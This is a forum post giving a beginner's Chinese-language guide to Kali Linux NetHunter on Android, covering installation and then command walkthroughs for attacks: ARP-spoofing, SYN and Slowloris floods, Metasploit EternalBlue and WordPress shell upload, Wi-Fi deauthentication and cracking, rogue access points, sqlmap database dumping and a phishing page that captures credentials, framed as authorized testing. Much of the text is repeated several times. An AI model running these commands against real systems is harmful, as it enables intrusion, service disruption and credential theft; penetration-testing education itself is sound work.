简体中文 繁體中文 English Deutsch 한국 사람 بالعربية TÜRKÇE português คนไทย Français Japanese

站内搜索

搜索

活动公告

通知:本站资源由网友上传分享,如有违规等问题请到版务模块进行投诉,将及时处理!
10-23 09:31

Kali Linux NetHunter新手入门完全指南从零开始掌握移动设备安全测试技能

SunJu_FaceMall

3万

主题

153

科技点

3万

积分

大区版主

碾压王

积分
32103
发表于 2025-9-4 22:40:01 | 显示全部楼层 |阅读模式 [标记阅至此楼]

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
引言

在当今数字化时代,移动设备已成为我们日常生活和工作中不可或缺的一部分。然而,随着移动技术的普及,移动设备安全问题也日益突出。从个人隐私泄露到企业数据被盗,移动安全威胁无处不在。为了有效应对这些威胁,安全专业人员需要掌握移动设备安全测试技能。

Kali Linux NetHunter是一款基于Android系统的移动渗透测试平台,它将强大的Kali Linux工具集移植到了移动设备上,使安全研究人员和渗透测试人员能够随时随地进行移动安全测试。本指南将带领您从零开始,逐步掌握使用Kali Linux NetHunter进行移动设备安全测试的技能。

Kali Linux NetHunter概述

什么是Kali Linux NetHunter?

Kali Linux NetHunter是由Offensive Security团队开发的一款开源移动渗透测试平台,它基于Android系统,集成了Kali Linux工具集。NetHunter允许用户在支持的Android设备上运行Kali Linux,并提供了一系列专门针对移动安全测试的工具和接口。

NetHunter的历史与发展

NetHunter项目最初于2014年启动,旨在将Kali Linux的强大功能带到移动设备上。随着版本的迭代更新,NetHunter逐渐增加了更多功能,支持了更多设备,并优化了用户体验。如今,NetHunter已成为移动安全测试领域的重要工具之一。

NetHunter的主要特点

1. 完整的Kali Linux工具集:NetHunter包含了Kali Linux中的大部分安全测试工具,如Nmap、Metasploit、Wireshark等。
2. 定制化内核:NetHunter提供了支持802.11无线注入和USB HID攻击的定制化内核,增强了设备的渗透测试能力。
3. 便携性:将强大的安全测试工具集成到移动设备中,使安全测试人员可以随时随地进行测试。
4. 多平台支持:NetHunter支持多种Android设备,包括手机、平板电脑甚至一些Chromebook。
5. 专用应用程序:NetHunter提供了专门的应用程序,如NetHunter App、NetHunter Store等,方便用户管理和使用工具。
6. 内置脚本:预置了多种攻击脚本,简化了常见攻击的实施过程。

完整的Kali Linux工具集:NetHunter包含了Kali Linux中的大部分安全测试工具,如Nmap、Metasploit、Wireshark等。

定制化内核:NetHunter提供了支持802.11无线注入和USB HID攻击的定制化内核,增强了设备的渗透测试能力。

便携性:将强大的安全测试工具集成到移动设备中,使安全测试人员可以随时随地进行测试。

多平台支持:NetHunter支持多种Android设备,包括手机、平板电脑甚至一些Chromebook。

专用应用程序:NetHunter提供了专门的应用程序,如NetHunter App、NetHunter Store等,方便用户管理和使用工具。

内置脚本:预置了多种攻击脚本,简化了常见攻击的实施过程。

NetHunter在移动安全测试中的优势

1. 便捷性:无需携带笔记本电脑,仅用手机即可进行基本的安全测试。
2. 隐蔽性:手机作为日常用品,使用它进行安全测试更加隐蔽,不易引起注意。
3. 多功能性:集成了多种安全测试工具,可以应对不同的测试场景。
4. 实时性:可以快速响应紧急的安全测试需求。
5. 学习友好:为初学者提供了友好的界面和操作指南,便于学习和实践。

便捷性:无需携带笔记本电脑,仅用手机即可进行基本的安全测试。

隐蔽性:手机作为日常用品,使用它进行安全测试更加隐蔽,不易引起注意。

多功能性:集成了多种安全测试工具,可以应对不同的测试场景。

实时性:可以快速响应紧急的安全测试需求。

学习友好:为初学者提供了友好的界面和操作指南,便于学习和实践。

系统要求

支持的设备

NetHunter支持多种Android设备,但并非所有设备都完全兼容。以下是主要的设备类别:

1. 官方支持设备:Nexus系列:Nexus 5、Nexus 6、Nexus 7(2013)、Nexus 9、Nexus 10OnePlus系列:OnePlus One、OnePlus 2、OnePlus 3/3T、OnePlus 5/5T、OnePlus 6/6T、OnePlus7⁄7Pro、OnePlus 7T/7T Pro、OnePlus8⁄8Pro、OnePlus 8T、OnePlus9⁄9Pro、OnePlus NordSamsung系列:部分Galaxy设备其他品牌:部分小米、华为、索尼等品牌的设备
2. Nexus系列:Nexus 5、Nexus 6、Nexus 7(2013)、Nexus 9、Nexus 10
3. OnePlus系列:OnePlus One、OnePlus 2、OnePlus 3/3T、OnePlus 5/5T、OnePlus 6/6T、OnePlus7⁄7Pro、OnePlus 7T/7T Pro、OnePlus8⁄8Pro、OnePlus 8T、OnePlus9⁄9Pro、OnePlus Nord
4. Samsung系列:部分Galaxy设备
5. 其他品牌:部分小米、华为、索尼等品牌的设备
6. 社区支持设备:
除了官方支持的设备外,NetHunter社区还提供了对其他设备的支持,具体列表可以在NetHunter官方论坛上找到。

官方支持设备:

• Nexus系列:Nexus 5、Nexus 6、Nexus 7(2013)、Nexus 9、Nexus 10
• OnePlus系列:OnePlus One、OnePlus 2、OnePlus 3/3T、OnePlus 5/5T、OnePlus 6/6T、OnePlus7⁄7Pro、OnePlus 7T/7T Pro、OnePlus8⁄8Pro、OnePlus 8T、OnePlus9⁄9Pro、OnePlus Nord
• Samsung系列:部分Galaxy设备
• 其他品牌:部分小米、华为、索尼等品牌的设备

社区支持设备:
除了官方支持的设备外,NetHunter社区还提供了对其他设备的支持,具体列表可以在NetHunter官方论坛上找到。

硬件要求

1. 处理器:建议使用ARMv7或更高架构的处理器。
2. 内存:至少2GB RAM,推荐3GB以上。
3. 存储空间:至少8GB可用空间,推荐16GB以上。
4. 网络:支持Wi-Fi和蓝牙功能。
5. USB OTG:支持USB On-The-Go功能,用于连接外部设备。

软件要求

1. 操作系统:Android 5.0或更高版本。
2. Bootloader解锁:设备的Bootloader需要解锁。
3. 自定义恢复:需要安装TWRP或其他自定义恢复。
4. Root权限:设备需要获取Root权限。

安装指南

准备工作

在安装NetHunter之前,需要进行以下准备工作:

1. 备份数据:安装过程会清除设备上的所有数据,请务必备份重要信息。
2. 解锁Bootloader:首先启用开发者选项:进入”设置” > “关于手机”,连续点击”版本号”7次。返回主菜单,进入”开发者选项”,启用”OEM解锁”和”USB调试”。连接电脑,安装ADB驱动。打开命令提示符或终端,输入以下命令重启到Bootloader模式:adb reboot bootloader解锁Bootloader(以Nexus设备为例):fastboot oem unlock确认解锁,设备会重启并清除所有数据。
3. 首先启用开发者选项:进入”设置” > “关于手机”,连续点击”版本号”7次。
4. 返回主菜单,进入”开发者选项”,启用”OEM解锁”和”USB调试”。
5. 连接电脑,安装ADB驱动。
6. 打开命令提示符或终端,输入以下命令重启到Bootloader模式:adb reboot bootloader
7. 解锁Bootloader(以Nexus设备为例):fastboot oem unlock
8. 确认解锁,设备会重启并清除所有数据。
9. 安装自定义恢复:下载适用于您设备的TWRP恢复镜像。将设备重启到Bootloader模式:adb reboot bootloader刷入TWRP:fastboot flash recovery twrp.img重启到恢复模式验证安装:fastboot reboot recovery
10. 下载适用于您设备的TWRP恢复镜像。
11. 将设备重启到Bootloader模式:adb reboot bootloader
12. 刷入TWRP:fastboot flash recovery twrp.img
13. 重启到恢复模式验证安装:fastboot reboot recovery

备份数据:安装过程会清除设备上的所有数据,请务必备份重要信息。

解锁Bootloader:

• 首先启用开发者选项:进入”设置” > “关于手机”,连续点击”版本号”7次。
• 返回主菜单,进入”开发者选项”,启用”OEM解锁”和”USB调试”。
• 连接电脑,安装ADB驱动。
• 打开命令提示符或终端,输入以下命令重启到Bootloader模式:adb reboot bootloader
• 解锁Bootloader(以Nexus设备为例):fastboot oem unlock
• 确认解锁,设备会重启并清除所有数据。
  1. adb reboot bootloader
复制代码
  1. fastboot oem unlock
复制代码

安装自定义恢复:

• 下载适用于您设备的TWRP恢复镜像。
• 将设备重启到Bootloader模式:adb reboot bootloader
• 刷入TWRP:fastboot flash recovery twrp.img
• 重启到恢复模式验证安装:fastboot reboot recovery
  1. adb reboot bootloader
复制代码
  1. fastboot flash recovery twrp.img
复制代码
  1. fastboot reboot recovery
复制代码

安装NetHunter

1. 下载NetHunter镜像:访问NetHunter官方网站(https://www.kali.org/get-kali/#kali-mobile)下载适用于您设备的NetHunter镜像。通常需要下载三个文件:NetHunter ROM、NetHunter内核和NetHunter应用程序包。
2. 访问NetHunter官方网站(https://www.kali.org/get-kali/#kali-mobile)下载适用于您设备的NetHunter镜像。
3. 通常需要下载三个文件:NetHunter ROM、NetHunter内核和NetHunter应用程序包。
4. 刷入NetHunter:将下载的文件传输到设备或SD卡。重启到TWRP恢复模式。在TWRP中,选择”Install”(安装),然后选择NetHunter ROM文件进行刷入。刷入完成后,不要重启,继续刷入NetHunter内核。最后,刷入NetHunter应用程序包。重启设备。
5. 将下载的文件传输到设备或SD卡。
6. 重启到TWRP恢复模式。
7. 在TWRP中,选择”Install”(安装),然后选择NetHunter ROM文件进行刷入。
8. 刷入完成后,不要重启,继续刷入NetHunter内核。
9. 最后,刷入NetHunter应用程序包。
10. 重启设备。
11. 初始配置:首次启动时,NetHunter会进行初始化设置。打开NetHunter应用程序,完成基本配置。根据需要下载和安装额外的工具包。
12. 首次启动时,NetHunter会进行初始化设置。
13. 打开NetHunter应用程序,完成基本配置。
14. 根据需要下载和安装额外的工具包。

下载NetHunter镜像:

• 访问NetHunter官方网站(https://www.kali.org/get-kali/#kali-mobile)下载适用于您设备的NetHunter镜像。
• 通常需要下载三个文件:NetHunter ROM、NetHunter内核和NetHunter应用程序包。

刷入NetHunter:

• 将下载的文件传输到设备或SD卡。
• 重启到TWRP恢复模式。
• 在TWRP中,选择”Install”(安装),然后选择NetHunter ROM文件进行刷入。
• 刷入完成后,不要重启,继续刷入NetHunter内核。
• 最后,刷入NetHunter应用程序包。
• 重启设备。

初始配置:

• 首次启动时,NetHunter会进行初始化设置。
• 打开NetHunter应用程序,完成基本配置。
• 根据需要下载和安装额外的工具包。

验证安装

1. 检查NetHunter应用:打开NetHunter应用程序,确认可以正常启动。检查菜单选项是否完整。
2. 打开NetHunter应用程序,确认可以正常启动。
3. 检查菜单选项是否完整。
4. 测试Kali终端:打开NetHunter终端应用。输入基本命令测试,如:whoami应该返回”root”。更新软件包列表:apt update
5. 打开NetHunter终端应用。
6. 输入基本命令测试,如:whoami应该返回”root”。
7. 更新软件包列表:apt update
8. 验证工具功能:尝试运行一些基本工具,如Nmap:nmap --version检查无线功能是否正常:airmon-ng
9. 尝试运行一些基本工具,如Nmap:nmap --version
10. 检查无线功能是否正常:airmon-ng

检查NetHunter应用:

• 打开NetHunter应用程序,确认可以正常启动。
• 检查菜单选项是否完整。

测试Kali终端:

• 打开NetHunter终端应用。
• 输入基本命令测试,如:whoami应该返回”root”。
• 更新软件包列表:apt update
  1. whoami
复制代码
  1. apt update
复制代码

验证工具功能:

• 尝试运行一些基本工具,如Nmap:nmap --version
• 检查无线功能是否正常:airmon-ng
  1. nmap --version
复制代码
  1. airmon-ng
复制代码

基本使用

界面介绍

1. NetHunter应用:主界面:显示设备信息、快速启动选项和常用工具。Kali服务:管理各种Kali服务的启动和停止。NetHunter菜单:访问各种工具和功能的入口。配置选项:自定义NetHunter设置。
2. 主界面:显示设备信息、快速启动选项和常用工具。
3. Kali服务:管理各种Kali服务的启动和停止。
4. NetHunter菜单:访问各种工具和功能的入口。
5. 配置选项:自定义NetHunter设置。
6. NetHunter终端:提供完整的Linux命令行环境。支持多种终端操作和快捷键。可以访问完整的Kali工具集。
7. 提供完整的Linux命令行环境。
8. 支持多种终端操作和快捷键。
9. 可以访问完整的Kali工具集。
10. NetHunter Store:提供额外的工具和应用程序。可以按类别浏览和安装工具。包含社区贡献的工具和脚本。
11. 提供额外的工具和应用程序。
12. 可以按类别浏览和安装工具。
13. 包含社区贡献的工具和脚本。

NetHunter应用:

• 主界面:显示设备信息、快速启动选项和常用工具。
• Kali服务:管理各种Kali服务的启动和停止。
• NetHunter菜单:访问各种工具和功能的入口。
• 配置选项:自定义NetHunter设置。

NetHunter终端:

• 提供完整的Linux命令行环境。
• 支持多种终端操作和快捷键。
• 可以访问完整的Kali工具集。

NetHunter Store:

• 提供额外的工具和应用程序。
• 可以按类别浏览和安装工具。
• 包含社区贡献的工具和脚本。

基本功能

1. 信息收集:使用Nmap进行网络扫描:nmap -sP 192.168.1.0/24使用Netdiscover发现网络中的主机:netdiscover -r 192.168.1.0/24
2. 使用Nmap进行网络扫描:nmap -sP 192.168.1.0/24
3. 使用Netdiscover发现网络中的主机:netdiscover -r 192.168.1.0/24
4. 无线网络分析:启动无线监听模式:airmon-ng start wlan0扫描附近的无线网络:airodump-ng wlan0mon
5. 启动无线监听模式:airmon-ng start wlan0
6. 扫描附近的无线网络:airodump-ng wlan0mon
7. 漏洞扫描:使用Nessus或OpenVAS进行漏洞扫描(需要先安装):service openvas start使用Nikto扫描Web漏洞:nikto -h http://example.com
8. 使用Nessus或OpenVAS进行漏洞扫描(需要先安装):service openvas start
9. 使用Nikto扫描Web漏洞:nikto -h http://example.com

信息收集:

• 使用Nmap进行网络扫描:nmap -sP 192.168.1.0/24
• 使用Netdiscover发现网络中的主机:netdiscover -r 192.168.1.0/24
  1. nmap -sP 192.168.1.0/24
复制代码
  1. netdiscover -r 192.168.1.0/24
复制代码

无线网络分析:

• 启动无线监听模式:airmon-ng start wlan0
• 扫描附近的无线网络:airodump-ng wlan0mon
  1. airmon-ng start wlan0
复制代码
  1. airodump-ng wlan0mon
复制代码

漏洞扫描:

• 使用Nessus或OpenVAS进行漏洞扫描(需要先安装):service openvas start
• 使用Nikto扫描Web漏洞:nikto -h http://example.com
  1. service openvas start
复制代码
  1. nikto -h http://example.com
复制代码

常用工具

1. 网络工具:Nmap:网络扫描和主机发现Wireshark:网络协议分析Netcat:网络连接和调试Tcpdump:网络数据包捕获
2. Nmap:网络扫描和主机发现
3. Wireshark:网络协议分析
4. Netcat:网络连接和调试
5. Tcpdump:网络数据包捕获
6. 无线工具:Aircrack-ng套件:无线网络评估和渗透测试Kismet:无线网络检测、嗅探和入侵检测Wifite:自动化无线攻击工具
7. Aircrack-ng套件:无线网络评估和渗透测试
8. Kismet:无线网络检测、嗅探和入侵检测
9. Wifite:自动化无线攻击工具
10. Web应用工具:Burp Suite:Web应用安全测试SQLmap:SQL注入检测和利用Nikto:Web服务器扫描器
11. Burp Suite:Web应用安全测试
12. SQLmap:SQL注入检测和利用
13. Nikto:Web服务器扫描器
14. 渗透测试框架:Metasploit Framework:渗透测试平台SET (Social-Engineer Toolkit):社会工程学工具集
15. Metasploit Framework:渗透测试平台
16. SET (Social-Engineer Toolkit):社会工程学工具集

网络工具:

• Nmap:网络扫描和主机发现
• Wireshark:网络协议分析
• Netcat:网络连接和调试
• Tcpdump:网络数据包捕获

无线工具:

• Aircrack-ng套件:无线网络评估和渗透测试
• Kismet:无线网络检测、嗅探和入侵检测
• Wifite:自动化无线攻击工具

Web应用工具:

• Burp Suite:Web应用安全测试
• SQLmap:SQL注入检测和利用
• Nikto:Web服务器扫描器

渗透测试框架:

• Metasploit Framework:渗透测试平台
• SET (Social-Engineer Toolkit):社会工程学工具集

核心功能详解

网络攻击

NetHunter提供了多种网络攻击工具和功能,可以用于网络安全测试和评估。

1. 中间人攻击(MITM):使用Ettercap进行ARP欺骗:ettercap -i wlan0 -T -M arp:remote // //使用BetterCAP进行更高级的中间人攻击:bettercap -iface wlan0
2. 使用Ettercap进行ARP欺骗:ettercap -i wlan0 -T -M arp:remote // //
3. 使用BetterCAP进行更高级的中间人攻击:bettercap -iface wlan0
4. 网络嗅探:使用tcpdump捕获网络流量:tcpdump -i wlan0 -w capture.pcap使用Wireshark分析捕获的流量(需要安装GUI环境):wireshark capture.pcap
5. 使用tcpdump捕获网络流量:tcpdump -i wlan0 -w capture.pcap
6. 使用Wireshark分析捕获的流量(需要安装GUI环境):wireshark capture.pcap
7. 拒绝服务攻击(DoS):使用hping3进行SYN洪水攻击(仅用于授权测试):hping3 -S --flood -p 80 192.168.1.100使用Slowloris进行HTTP拒绝服务攻击:slowloris -dns example.com
8. 使用hping3进行SYN洪水攻击(仅用于授权测试):hping3 -S --flood -p 80 192.168.1.100
9. 使用Slowloris进行HTTP拒绝服务攻击:slowloris -dns example.com

中间人攻击(MITM):

• 使用Ettercap进行ARP欺骗:ettercap -i wlan0 -T -M arp:remote // //
• 使用BetterCAP进行更高级的中间人攻击:bettercap -iface wlan0
  1. ettercap -i wlan0 -T -M arp:remote // //
复制代码
  1. bettercap -iface wlan0
复制代码

网络嗅探:

• 使用tcpdump捕获网络流量:tcpdump -i wlan0 -w capture.pcap
• 使用Wireshark分析捕获的流量(需要安装GUI环境):wireshark capture.pcap
  1. tcpdump -i wlan0 -w capture.pcap
复制代码
  1. wireshark capture.pcap
复制代码

拒绝服务攻击(DoS):

• 使用hping3进行SYN洪水攻击(仅用于授权测试):hping3 -S --flood -p 80 192.168.1.100
• 使用Slowloris进行HTTP拒绝服务攻击:slowloris -dns example.com
  1. hping3 -S --flood -p 80 192.168.1.100
复制代码
  1. slowloris -dns example.com
复制代码

渗透测试

NetHunter集成了多种渗透测试工具,可以用于系统漏洞评估和利用。

1. Metasploit Framework:启动Metasploit控制台:msfconsole使用特定模块进行渗透测试:use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
exploit
2. 启动Metasploit控制台:msfconsole
3. 使用特定模块进行渗透测试:use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
exploit
4. 漏洞扫描:使用Nessus进行漏洞扫描(需要先安装和配置):/etc/init.d/nessusd start使用OpenVAS进行漏洞评估:openvas-start
5. 使用Nessus进行漏洞扫描(需要先安装和配置):/etc/init.d/nessusd start
6. 使用OpenVAS进行漏洞评估:openvas-start
7. 密码攻击:使用John the Ripper进行密码破解:john --format=nt hashes.txt使用Hashcat进行GPU加速密码破解:hashcat -m 1000 -a 0 hashes.txt wordlist.txt
8. 使用John the Ripper进行密码破解:john --format=nt hashes.txt
9. 使用Hashcat进行GPU加速密码破解:hashcat -m 1000 -a 0 hashes.txt wordlist.txt

Metasploit Framework:

• 启动Metasploit控制台:msfconsole
• 使用特定模块进行渗透测试:use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
exploit
  1. msfconsole
复制代码
  1. use exploit/windows/smb/ms17_010_eternalblue
  2. set RHOSTS 192.168.1.100
  3. exploit
复制代码

漏洞扫描:

• 使用Nessus进行漏洞扫描(需要先安装和配置):/etc/init.d/nessusd start
• 使用OpenVAS进行漏洞评估:openvas-start
  1. /etc/init.d/nessusd start
复制代码
  1. openvas-start
复制代码

密码攻击:

• 使用John the Ripper进行密码破解:john --format=nt hashes.txt
• 使用Hashcat进行GPU加速密码破解:hashcat -m 1000 -a 0 hashes.txt wordlist.txt
  1. john --format=nt hashes.txt
复制代码
  1. hashcat -m 1000 -a 0 hashes.txt wordlist.txt
复制代码

无线安全

NetHunter特别强化了无线安全测试功能,使其成为评估无线网络安全的强大工具。

1. WEP/WPA/WPA2破解:使用Aircrack-ng套件进行WEP破解:airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng -1 0 -a target_mac wlan0mon
aireplay-ng -3 -b target_mac wlan0mon
aircrack-ng -b target_mac capture-01.cap使用Wifite自动化WPA/WPA2破解:wifite --all
2. 使用Aircrack-ng套件进行WEP破解:airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng -1 0 -a target_mac wlan0mon
aireplay-ng -3 -b target_mac wlan0mon
aircrack-ng -b target_mac capture-01.cap
3. 使用Wifite自动化WPA/WPA2破解:wifite --all
4. Rogue AP攻击:使用Airbase-ng创建恶意接入点:airbase-ng -e "Free WiFi" -c 6 wlan0mon使用Hostapd-wpe创建带有恶意认证的接入点:hostapd-wpe hostapd-wpe.conf
5. 使用Airbase-ng创建恶意接入点:airbase-ng -e "Free WiFi" -c 6 wlan0mon
6. 使用Hostapd-wpe创建带有恶意认证的接入点:hostapd-wpe hostapd-wpe.conf
7. 蓝牙攻击:使用Bluelog扫描蓝牙设备:bluelog -o output.txt使用Btlejack进行低功耗蓝牙攻击:btlejack -t target_mac
8. 使用Bluelog扫描蓝牙设备:bluelog -o output.txt
9. 使用Btlejack进行低功耗蓝牙攻击:btlejack -t target_mac

WEP/WPA/WPA2破解:

• 使用Aircrack-ng套件进行WEP破解:airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng -1 0 -a target_mac wlan0mon
aireplay-ng -3 -b target_mac wlan0mon
aircrack-ng -b target_mac capture-01.cap
• 使用Wifite自动化WPA/WPA2破解:wifite --all
  1. airmon-ng start wlan0
  2. airodump-ng wlan0mon
  3. aireplay-ng -1 0 -a target_mac wlan0mon
  4. aireplay-ng -3 -b target_mac wlan0mon
  5. aircrack-ng -b target_mac capture-01.cap
复制代码
  1. wifite --all
复制代码

Rogue AP攻击:

• 使用Airbase-ng创建恶意接入点:airbase-ng -e "Free WiFi" -c 6 wlan0mon
• 使用Hostapd-wpe创建带有恶意认证的接入点:hostapd-wpe hostapd-wpe.conf
  1. airbase-ng -e "Free WiFi" -c 6 wlan0mon
复制代码
  1. hostapd-wpe hostapd-wpe.conf
复制代码

蓝牙攻击:

• 使用Bluelog扫描蓝牙设备:bluelog -o output.txt
• 使用Btlejack进行低功耗蓝牙攻击:btlejack -t target_mac
  1. bluelog -o output.txt
复制代码
  1. btlejack -t target_mac
复制代码

移动应用安全

NetHunter也提供了一些专门用于移动应用安全测试的工具。

1. Android应用分析:使用Apktool反编译Android应用:apktool d app.apk使用Dex2Jar将DEX文件转换为JAR:d2j-dex2jar classes.dex
2. 使用Apktool反编译Android应用:apktool d app.apk
3. 使用Dex2Jar将DEX文件转换为JAR:d2j-dex2jar classes.dex
4. iOS应用分析:使用Clutch解密iOS应用(需要越狱设备):Clutch -i
Clutch -d 2使用Class-dump分析iOS应用头文件:class-dump -H AppBinary -o Headers
5. 使用Clutch解密iOS应用(需要越狱设备):Clutch -i
Clutch -d 2
6. 使用Class-dump分析iOS应用头文件:class-dump -H AppBinary -o Headers

Android应用分析:

• 使用Apktool反编译Android应用:apktool d app.apk
• 使用Dex2Jar将DEX文件转换为JAR:d2j-dex2jar classes.dex
  1. apktool d app.apk
复制代码
  1. d2j-dex2jar classes.dex
复制代码

iOS应用分析:

• 使用Clutch解密iOS应用(需要越狱设备):Clutch -i
Clutch -d 2
• 使用Class-dump分析iOS应用头文件:class-dump -H AppBinary -o Headers
  1. Clutch -i
  2. Clutch -d 2
复制代码
  1. class-dump -H AppBinary -o Headers
复制代码

实战案例

案例一:无线网络渗透测试

在这个案例中,我们将演示如何使用NetHunter对无线网络进行授权的渗透测试。

目标:评估目标无线网络的安全性(已获得授权)。

步骤:

1. 信息收集:启动NetHunter终端。启用无线监听模式:airmon-ng start wlan0扫描附近的无线网络:airodump-ng wlan0mon记录目标网络的BSSID和信道。
2. 启动NetHunter终端。
3. 启用无线监听模式:airmon-ng start wlan0
4. 扫描附近的无线网络:airodump-ng wlan0mon
5. 记录目标网络的BSSID和信道。
6. 捕获握手包:针对目标网络进行数据包捕获:airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon使用Deauthentication攻击强制客户端重新连接,以捕获握手包:aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
7. 针对目标网络进行数据包捕获:airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
8. 使用Deauthentication攻击强制客户端重新连接,以捕获握手包:aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
9. 密码破解:使用Aircrack-ng尝试破解密码:aircrack-ng -w wordlist.txt capture-01.cap或者使用Hashcat进行GPU加速破解:aircrack-ng -J hash capture-01.cap
hashcat -m 2500 hash.txt wordlist.txt
10. 使用Aircrack-ng尝试破解密码:aircrack-ng -w wordlist.txt capture-01.cap
11. 或者使用Hashcat进行GPU加速破解:aircrack-ng -J hash capture-01.cap
hashcat -m 2500 hash.txt wordlist.txt
12. 报告结果:记录测试结果和发现的漏洞。提供安全建议,如使用强密码、启用WPA3等。
13. 记录测试结果和发现的漏洞。
14. 提供安全建议,如使用强密码、启用WPA3等。

信息收集:

• 启动NetHunter终端。
• 启用无线监听模式:airmon-ng start wlan0
• 扫描附近的无线网络:airodump-ng wlan0mon
• 记录目标网络的BSSID和信道。
  1. airmon-ng start wlan0
复制代码
  1. airodump-ng wlan0mon
复制代码

捕获握手包:

• 针对目标网络进行数据包捕获:airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
• 使用Deauthentication攻击强制客户端重新连接,以捕获握手包:aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
  1. airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
复制代码
  1. aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
复制代码

密码破解:

• 使用Aircrack-ng尝试破解密码:aircrack-ng -w wordlist.txt capture-01.cap
• 或者使用Hashcat进行GPU加速破解:aircrack-ng -J hash capture-01.cap
hashcat -m 2500 hash.txt wordlist.txt
  1. aircrack-ng -w wordlist.txt capture-01.cap
复制代码
  1. aircrack-ng -J hash capture-01.cap
  2. hashcat -m 2500 hash.txt wordlist.txt
复制代码

报告结果:

• 记录测试结果和发现的漏洞。
• 提供安全建议,如使用强密码、启用WPA3等。

案例二:Web应用渗透测试

在这个案例中,我们将演示如何使用NetHunter对Web应用进行授权的渗透测试。

目标:评估目标Web应用的安全性(已获得授权)。

步骤:

1. 信息收集:使用Nmap扫描目标服务器:nmap -sV -sC -p- 192.168.1.100使用WhatWeb识别Web技术:whatweb http://192.168.1.100
2. 使用Nmap扫描目标服务器:nmap -sV -sC -p- 192.168.1.100
3. 使用WhatWeb识别Web技术:whatweb http://192.168.1.100
4. 漏洞扫描:使用Nikto扫描Web漏洞:nikto -h http://192.168.1.100使用SQLmap检测SQL注入漏洞:sqlmap -u "http://192.168.1.100/page.php?id=1" --batch
5. 使用Nikto扫描Web漏洞:nikto -h http://192.168.1.100
6. 使用SQLmap检测SQL注入漏洞:sqlmap -u "http://192.168.1.100/page.php?id=1" --batch
7.
  1. 漏洞利用:如果发现SQL注入漏洞,使用SQLmap进一步利用:sqlmap -u "http://192.168.1.100/page.php?id=1" --dbs --batch
  2. sqlmap -u "http://192.168.1.100/page.php?id=1" -D database_name --tables --batch使用Metasploit利用已知漏洞:msfconsole
  3. use exploit/unix/webapp/wp_admin_shell_upload
  4. set RHOSTS 192.168.1.100
  5. set TARGETURI /wordpress/
  6. exploit
复制代码
8.
  1. 如果发现SQL注入漏洞,使用SQLmap进一步利用:sqlmap -u "http://192.168.1.100/page.php?id=1" --dbs --batch
  2. sqlmap -u "http://192.168.1.100/page.php?id=1" -D database_name --tables --batch
复制代码
9. 使用Metasploit利用已知漏洞:msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS 192.168.1.100
set TARGETURI /wordpress/
exploit
10. 报告结果:记录测试结果和发现的漏洞。提供安全建议,如更新软件、修补漏洞等。
11. 记录测试结果和发现的漏洞。
12. 提供安全建议,如更新软件、修补漏洞等。

信息收集:

• 使用Nmap扫描目标服务器:nmap -sV -sC -p- 192.168.1.100
• 使用WhatWeb识别Web技术:whatweb http://192.168.1.100
  1. nmap -sV -sC -p- 192.168.1.100
复制代码
  1. whatweb http://192.168.1.100
复制代码

漏洞扫描:

• 使用Nikto扫描Web漏洞:nikto -h http://192.168.1.100
• 使用SQLmap检测SQL注入漏洞:sqlmap -u "http://192.168.1.100/page.php?id=1" --batch
  1. nikto -h http://192.168.1.100
复制代码
  1. sqlmap -u "http://192.168.1.100/page.php?id=1" --batch
复制代码

漏洞利用:

  1. 如果发现SQL注入漏洞,使用SQLmap进一步利用:sqlmap -u "http://192.168.1.100/page.php?id=1" --dbs --batch
  2. sqlmap -u "http://192.168.1.100/page.php?id=1" -D database_name --tables --batch
复制代码
• 使用Metasploit利用已知漏洞:msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS 192.168.1.100
set TARGETURI /wordpress/
exploit
  1. sqlmap -u "http://192.168.1.100/page.php?id=1" --dbs --batch
  2. sqlmap -u "http://192.168.1.100/page.php?id=1" -D database_name --tables --batch
复制代码
  1. msfconsole
  2. use exploit/unix/webapp/wp_admin_shell_upload
  3. set RHOSTS 192.168.1.100
  4. set TARGETURI /wordpress/
  5. exploit
复制代码

报告结果:

• 记录测试结果和发现的漏洞。
• 提供安全建议,如更新软件、修补漏洞等。

案例三:社会工程学攻击

在这个案例中,我们将演示如何使用NetHunter进行授权的社会工程学攻击测试。

目标:评估组织对社会工程学攻击的防范能力(已获得授权)。

步骤:

1. 准备阶段:启动NetHunter终端。更新SET工具包:setoolkit选择社会工程学攻击选项。
2. 启动NetHunter终端。
3. 更新SET工具包:setoolkit
4. 选择社会工程学攻击选项。
5. 创建钓鱼网站:选择”网站攻击向量”。选择”克隆网站”。输入要克隆的网站URL(如公司登录页面)。设置NetHunter作为托管钓鱼网站的服务器。
6. 选择”网站攻击向量”。
7. 选择”克隆网站”。
8. 输入要克隆的网站URL(如公司登录页面)。
9. 设置NetHunter作为托管钓鱼网站的服务器。
10. 发送钓鱼邮件:使用SET创建钓鱼邮件模板。配置SMTP服务器设置。发送钓鱼邮件给目标用户。
11. 使用SET创建钓鱼邮件模板。
12. 配置SMTP服务器设置。
13. 发送钓鱼邮件给目标用户。
14. 捕获凭证:监控SET日志,查看是否有用户点击链接并输入凭证。记录捕获的用户名和密码。
15. 监控SET日志,查看是否有用户点击链接并输入凭证。
16. 记录捕获的用户名和密码。
17. 报告结果:记录测试结果和成功/失败率。提供安全建议,如加强员工安全意识培训、实施多因素认证等。
18. 记录测试结果和成功/失败率。
19. 提供安全建议,如加强员工安全意识培训、实施多因素认证等。

准备阶段:

• 启动NetHunter终端。
• 更新SET工具包:setoolkit
• 选择社会工程学攻击选项。
